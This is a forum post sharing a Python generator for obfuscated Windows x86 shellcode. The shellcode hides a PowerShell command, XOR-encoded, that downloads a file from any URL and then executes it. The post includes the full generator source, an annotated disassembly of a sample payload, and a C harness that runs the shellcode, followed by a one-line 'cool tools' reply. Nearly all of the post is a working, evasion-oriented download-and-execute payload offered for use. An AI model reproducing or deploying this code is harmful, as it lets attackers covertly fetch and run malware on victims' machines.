geeko Posted April 8, 2015 Report Share Posted April 8, 2015 #Title: Obfuscated Shellcode Windows x86/x64 Download And Execute [Use PowerShell] - Generator#length: Dynamic ! depend on url and filename#Date: 20 January 2015#Author: Ali Razmjoo#tested On: Windows 7 x64 ultimate#WinExec => 0x77b1e695#ExitProcess => 0x77ae2acf#====================================#Execute :#powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe', 'D:\Ali.exe')};D:\Ali.exe"#====================================#Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com']#Thanks to my friends , Dariush Nasirpour and Ehsan Nezami#####################################################How it work ?'''C:\Users\Ali\Desktop>python "Windows x86 Download And Execute.py"Enter urlExample: http://z3r0d4y.com/file.exeEnter:http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exeEnter filenameExample: D:\file.exeEnter:C:\Ali.exeC:\Users\Ali\Desktop>nasm -f elf shellcode.asm -o shellcode.oC:\Users\Ali\Desktop>objdump -D shellcode.oshellcode.o: file format elf32-i386Disassembly of section .text:00000000 <.text>:0: 31 c0 xor %eax,%eax2: 50 push %eax3: 68 41 41 65 22 push $0x226541418: 58 pop %eax9: c1 e8 08 shr $0x8,%eaxc: c1 e8 08 shr $0x8,%eaxf: 50 push %eax10: b8 34 47 0b 4d mov $0x4d0b4734,%eax15: bb 5d 69 6e 35 mov $0x356e695d,%ebx1a: 31 d8 xor %ebx,%eax1c: 50 push %eax1d: b8 43 32 10 22 mov $0x22103243,%eax22: bb 79 6e 51 4e mov $0x4e516e79,%ebx27: 31 d8 xor %ebx,%eax29: 50 push %eax2a: b8 60 05 42 32 mov $0x32420560,%eax2f: bb 49 78 79 71 mov $0x71797849,%ebx34: 31 d8 xor %ebx,%eax36: 50 push %eax37: b8 0f 1c 2c 14 mov $0x142c1c0f,%eax3c: bb 6a 64 49 33 mov $0x3349646a,%ebx41: 31 d8 xor %ebx,%eax43: 50 push %eax44: b8 07 3e 0b 40 mov $0x400b3e07,%eax49: bb 46 52 62 6e mov $0x6e625246,%ebx4e: 31 d8 xor %ebx,%eax50: 50 push %eax51: b8 44 0a 78 07 mov $0x7780a44,%eax56: bb 63 49 42 5b mov $0x5b424963,%ebx5b: 31 d8 xor 
%ebx,%eax5d: 50 push %eax5e: b8 0f 16 4b 0d mov $0xd4b160f,%eax63: bb 6a 31 67 2d mov $0x2d67316a,%ebx68: 31 d8 xor %ebx,%eax6a: 50 push %eax6b: b8 18 62 5c 1f mov $0x1f5c6218,%eax70: bb 61 4c 39 67 mov $0x67394c61,%ebx75: 31 d8 xor %ebx,%eax77: 50 push %eax78: b8 1b 2d 1e 1f mov $0x1f1e2d1b,%eax7d: bb 6b 58 6a 6b mov $0x6b6a586b,%ebx82: 31 d8 xor %ebx,%eax84: 50 push %eax85: b8 45 40 41 66 mov $0x66414045,%eax8a: bb 3d 78 77 49 mov $0x4977783d,%ebx8f: 31 d8 xor %ebx,%eax91: 50 push %eax92: b8 02 1f 4b 45 mov $0x454b1f02,%eax97: bb 6d 6b 38 6a mov $0x6a386b6d,%ebx9c: 31 d8 xor %ebx,%eax9e: 50 push %eax9f: b8 24 3e 19 32 mov $0x32193e24,%eaxa4: bb 45 4e 6a 5a mov $0x5a6a4e45,%ebxa9: 31 d8 xor %ebx,%eaxab: 50 push %eaxac: b8 00 5e 3a 35 mov $0x353a5e00,%eaxb1: bb 6c 73 49 5b mov $0x5b49736c,%ebxb6: 31 d8 xor %ebx,%eaxb8: 50 push %eaxb9: b8 1f 37 40 24 mov $0x2440371f,%eaxbe: bb 6d 52 32 41 mov $0x4132526d,%ebxc3: 31 d8 xor %ebx,%eaxc5: 50 push %eaxc6: b8 2e 35 68 31 mov $0x3168352e,%eaxcb: bb 5a 4c 45 41 mov $0x41454c5a,%ebxd0: 31 d8 xor %ebx,%eaxd2: 50 push %eaxd3: b8 48 1e 1c 15 mov $0x151c1e48,%eaxd8: bb 67 6e 69 61 mov $0x61696e67,%ebxdd: 31 d8 xor %ebx,%eaxdf: 50 push %eaxe0: b8 26 28 0d 5d mov $0x5d0d2826,%eaxe5: bb 4f 45 62 33 mov $0x3362454f,%ebxea: 31 d8 xor %ebx,%eaxec: 50 push %eaxed: b8 20 57 1d 45 mov $0x451d5720,%eaxf2: bb 47 78 63 36 mov $0x36637847,%ebxf7: 31 d8 xor %ebx,%eaxf9: 50 push %eaxfa: b8 04 6a 24 3b mov $0x3b246a04,%eaxff: bb 77 44 4b 49 mov $0x494b4477,%ebx104: 31 d8 xor %ebx,%eax106: 50 push %eax107: b8 18 0f 0a 32 mov $0x320a0f18,%eax10c: bb 6c 6e 78 47 mov $0x47786e6c,%ebx111: 31 d8 xor %ebx,%eax113: 50 push %eax114: b8 7d 18 3c 27 mov $0x273c187d,%eax119: bb 52 6c 5d 55 mov $0x555d6c52,%ebx11e: 31 d8 xor %ebx,%eax120: 50 push %eax121: b8 03 44 60 60 mov $0x60604403,%eax126: bb 77 34 5a 4f mov $0x4f5a3477,%ebx12b: 31 d8 xor %ebx,%eax12d: 50 push %eax12e: b8 47 6b 1f 20 mov $0x201f6b47,%eax133: bb 6f 4c 77 54 mov $0x54774c6f,%ebx138: 31 
d8 xor %ebx,%eax13a: 50 push %eax13b: b8 2a 5e 2b 20 mov $0x202b5e2a,%eax140: bb 6c 37 47 45 mov $0x4547376c,%ebx145: 31 d8 xor %ebx,%eax147: 50 push %eax148: b8 59 07 12 0e mov $0xe120759,%eax14d: bb 35 68 73 6a mov $0x6a736835,%ebx152: 31 d8 xor %ebx,%eax154: 50 push %eax155: b8 01 59 11 2c mov $0x2c115901,%eax15a: bb 45 36 66 42 mov $0x42663645,%ebx15f: 31 d8 xor %ebx,%eax161: 50 push %eax162: b8 22 22 4e 5a mov $0x5a4e2222,%eax167: bb 4c 56 67 74 mov $0x7467564c,%ebx16c: 31 d8 xor %ebx,%eax16e: 50 push %eax16f: b8 00 37 1b 48 mov $0x481b3700,%eax174: bb 43 5b 72 2d mov $0x2d725b43,%ebx179: 31 d8 xor %ebx,%eax17b: 50 push %eax17c: b8 4a 1f 22 13 mov $0x13221f4a,%eax181: bb 64 48 47 71 mov $0x71474864,%ebx186: 31 d8 xor %ebx,%eax188: 50 push %eax189: b8 6a 23 03 18 mov $0x1803236a,%eax18e: bb 4a 6d 66 6c mov $0x6c666d4a,%ebx193: 31 d8 xor %ebx,%eax195: 50 push %eax196: b8 2d 54 57 1c mov $0x1c57542d,%eax19b: bb 47 31 34 68 mov $0x68343147,%ebx1a0: 31 d8 xor %ebx,%eax1a2: 50 push %eax1a3: b8 4e 15 36 5a mov $0x5a36154e,%eax1a8: bb 39 38 79 38 mov $0x38793839,%ebx1ad: 31 d8 xor %ebx,%eax1af: 50 push %eax1b0: b8 59 7f 1f 04 mov $0x41f7f59,%eax1b5: bb 79 57 51 61 mov $0x61515779,%ebx1ba: 31 d8 xor %ebx,%eax1bc: 50 push %eax1bd: b8 47 56 1d 2f mov $0x2f1d5647,%eax1c2: bb 65 70 3d 54 mov $0x543d7065,%ebx1c7: 31 d8 xor %ebx,%eax1c9: 50 push %eax1ca: b8 2c 18 08 54 mov $0x5408182c,%eax1cf: bb 4d 76 6c 74 mov $0x746c764d,%ebx1d4: 31 d8 xor %ebx,%eax1d6: 50 push %eax1d7: b8 5a 34 58 1b mov $0x1b58345a,%eax1dc: bb 39 5b 35 76 mov $0x76355b39,%ebx1e1: 31 d8 xor %ebx,%eax1e3: 50 push %eax1e4: b8 3f 0f 4b 41 mov $0x414b0f3f,%eax1e9: bb 53 63 6b 6c mov $0x6c6b6353,%ebx1ee: 31 d8 xor %ebx,%eax1f0: 50 push %eax1f1: b8 4a 1e 59 0b mov $0xb591e4a,%eax1f6: bb 38 6d 31 6e mov $0x6e316d38,%ebx1fb: 31 d8 xor %ebx,%eax1fd: 50 push %eax1fe: b8 49 2b 16 2a mov $0x2a162b49,%eax203: bb 39 44 61 4f mov $0x4f614439,%ebx208: 31 d8 xor %ebx,%eax20a: 50 push %eax20b: 89 e0 mov %esp,%eax20d: bb 
41 41 41 01 mov $0x1414141,%ebx212: c1 eb 08 shr $0x8,%ebx215: c1 eb 08 shr $0x8,%ebx218: c1 eb 08 shr $0x8,%ebx21b: 53 push %ebx21c: 50 push %eax21d: bb 95 e6 b1 77 mov $0x77b1e695,%ebx222: ff d3 call *%ebx224: bb cf 2a ae 77 mov $0x77ae2acf,%ebx229: ff d3 call *%ebxC:\Users\Ali\Desktop>#you have your shellcode now=======================================shellcode.c#include <stdio.h>#include <string.h>int main(){unsigned char shellcode[]= "\x31\xc0\x50\x68\x41\x41\x65\x22\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb8\x34\x47\x0b?\x4d\xbb\x5d\x69\x6e\x35\x31\xd8\x50\xb8\x43\x32\x10\x22\xbb\x79\x6e\x51\x4e\x31?\xd8\x50\xb8\x60\x05\x42\x32\xbb\x49\x78\x79\x71\x31\xd8\x50\xb8\x0f\x1c\x2c\x14?\xbb\x6a\x64\x49\x33\x31\xd8\x50\xb8\x07\x3e\x0b\x40\xbb\x46\x52\x62\x6e\x31\xd8?\x50\xb8\x44\x0a\x78\x07\xbb\x63\x49\x42\x5b\x31\xd8\x50\xb8\x0f\x16\x4b\x0d\xbb?\x6a\x31\x67\x2d\x31\xd8\x50\xb8\x18\x62\x5c\x1f\xbb\x61\x4c\x39\x67\x31\xd8\x50?\xb8\x1b\x2d\x1e\x1f\xbb\x6b\x58\x6a\x6b\x31\xd8\x50\xb8\x45\x40\x41\x66\xbb\x3d?\x78\x77\x49\x31\xd8\x50\xb8\x02\x1f\x4b\x45\xbb\x6d\x6b\x38\x6a\x31\xd8\x50\xb8?\x24\x3e\x19\x32\xbb\x45\x4e\x6a\x5a\x31\xd8\x50\xb8\x00\x5e\x3a\x35\xbb\x6c\x73?\x49\x5b\x31\xd8\x50\xb8\x1f\x37\x40\x24\xbb\x6d\x52\x32\x41\x31\xd8\x50\xb8\x2e?\x35\x68\x31\xbb\x5a\x4c\x45\x41\x31\xd8\x50\xb8\x48\x1e\x1c\x15\xbb\x67\x6e\x69?\x61\x31\xd8\x50\xb8\x26\x28\x0d\x5d\xbb\x4f\x45\x62\x33\x31\xd8\x50\xb8\x20\x57?\x1d\x45\xbb\x47\x78\x63\x36\x31\xd8\x50\xb8\x04\x6a\x24\x3b\xbb\x77\x44\x4b\x49?\x31\xd8\x50\xb8\x18\x0f\x0a\x32\xbb\x6c\x6e\x78\x47\x31\xd8\x50\xb8\x7d\x18\x3c?\x27\xbb\x52\x6c\x5d\x55\x31\xd8\x50\xb8\x03\x44\x60\x60\xbb\x77\x34\x5a\x4f\x31?\xd8\x50\xb8\x47\x6b\x1f\x20\xbb\x6f\x4c\x77\x54\x31\xd8\x50\xb8\x2a\x5e\x2b\x20?\xbb\x6c\x37\x47\x45\x31\xd8\x50\xb8\x59\x07\x12\x0e\xbb\x35\x68\x73\x6a\x31\xd8?\x50\xb8\x01\x59\x11\x2c\xbb\x45\x36\x66\x42\x31\xd8\x50\xb8\x22\x22\x4e\x5a\xbb?\x4c\x56\x67\x74\x31\xd8\x50\xb8\x00\x37\x1b\x48\xbb\x43\x5b\x72\x2d\x31\xd8\x50?\xb8\x4a\x1f\x22\x
13\xbb\x64\x48\x47\x71\x31\xd8\x50\xb8\x6a\x23\x03\x18\xbb\x4a?\x6d\x66\x6c\x31\xd8\x50\xb8\x2d\x54\x57\x1c\xbb\x47\x31\x34\x68\x31\xd8\x50\xb8?\x4e\x15\x36\x5a\xbb\x39\x38\x79\x38\x31\xd8\x50\xb8\x59\x7f\x1f\x04\xbb\x79\x57?\x51\x61\x31\xd8\x50\xb8\x47\x56\x1d\x2f\xbb\x65\x70\x3d\x54\x31\xd8\x50\xb8\x2c?\x18\x08\x54\xbb\x4d\x76\x6c\x74\x31\xd8\x50\xb8\x5a\x34\x58\x1b\xbb\x39\x5b\x35?\x76\x31\xd8\x50\xb8\x3f\x0f\x4b\x41\xbb\x53\x63\x6b\x6c\x31\xd8\x50\xb8\x4a\x1e?\x59\x0b\xbb\x38\x6d\x31\x6e\x31\xd8\x50\xb8\x49\x2b\x16\x2a\xbb\x39\x44\x61\x4f?\x31\xd8\x50\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53?\x50\xbb\x95\xe6\xb1\x77\xff\xd3\xbb\xcf\x2a\xae\x77\xff\xd3";fprintf(stdout,"Length: %d\n\n",strlen(shellcode));(*(void(*)()) shellcode)();}=======================================C:\Users\Ali\Desktop>gcc shellcode.c -o shellcode.exeC:\Users\Ali\Desktop>shellcode.exeLength: 173C:\Users\Ali\Desktop>#notice : when program exit, you must wait 2-3 second , it will finish download and execute file after 2-3 second'''import random,binasciichars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz123456789=[]-'p1 = '''xor eax,eaxpush eax'''p2 = '''mov eax,espmov ebx,0x01414141shr ebx,0x08shr ebx,0x08shr ebx,0x08push ebxpush eaxmov ebx,0x77b1e695call ebxmov ebx,0x77ae2acfcall ebx'''sen1 = str(raw_input('Enter url\nExample: http://z3r0d4y.com/file.exe \nEnter:'))sen1 = sen1.rsplit()sen1 = sen1[0]sen2 = str(raw_input('Enter filename\nExample: D:\\file.exe\nEnter:'))sen2 = sen2.rsplit()sen2 = sen2[0]sen = '''powershell -command "& { (New-Object Net.WebClient).DownloadFile('%s', '%s')};%s"''' %(sen1,sen2,sen2)m = 0for word in sen:m += 1m = m - 1stack = ''while(m>=0):stack += sen[m]m -= 1stack = stack.encode('hex')skip = 1if len(stack) % 8 == 0:skip = 0if skip is 1:stack = '00' + stackif len(stack) % 8 == 0:skip = 0if skip is 1:stack = '00' + stackif len(stack) % 8 == 0:skip = 0if skip is 1:stack = '00' + stackif len(stack) % 8 == 0:skip = 0if len(stack) % 
8 == 0:zxzxzxz = 0m = len(stack) / 8c = 0n = 0z = 8shf = open('shellcode.asm','w')shf.write(p1)shf.close()shf = open('shellcode.asm','a')while(c<m):v = 'push 0x' + stack[n:z]skip = 0if '0x000000' in v:skip = 1q1 = v[13:]v = 'push 0x' + q1 + '414141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\nshr eax,0x08\npush eax\n'if '0x0000' in v:skip = 1q1 = v[11:]v = 'push 0x' + q1 + '4141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\npush eax\n'if '0x00' in v:skip = 1q1 = v[9:]v = 'push 0x' + q1 + '41' + '\n' + 'pop eax\nshr eax,0x08\npush eax\n'if skip is 1:shf.write(v)if skip is 0:v = v.rsplit()zzz = ''for w in v:if '0x' in w:zzz = str(w)s1 = binascii.b2a_hex(''.join(random.choice(chars) for i in range(4)))s1 = '0x%s'%s1data = "%x" % (int(zzz, 16) ^ int(s1, 16))v = 'mov eax,0x%s\nmov ebx,%s\nxor eax,ebx\npush eax\n'%(data,s1)shf.write(v)n += 8z += 8c += 1shf.write(p2)shf.close() Quote Link to comment Share on other sites More sharing options...
fisher5 Posted October 13, 2015: cool tools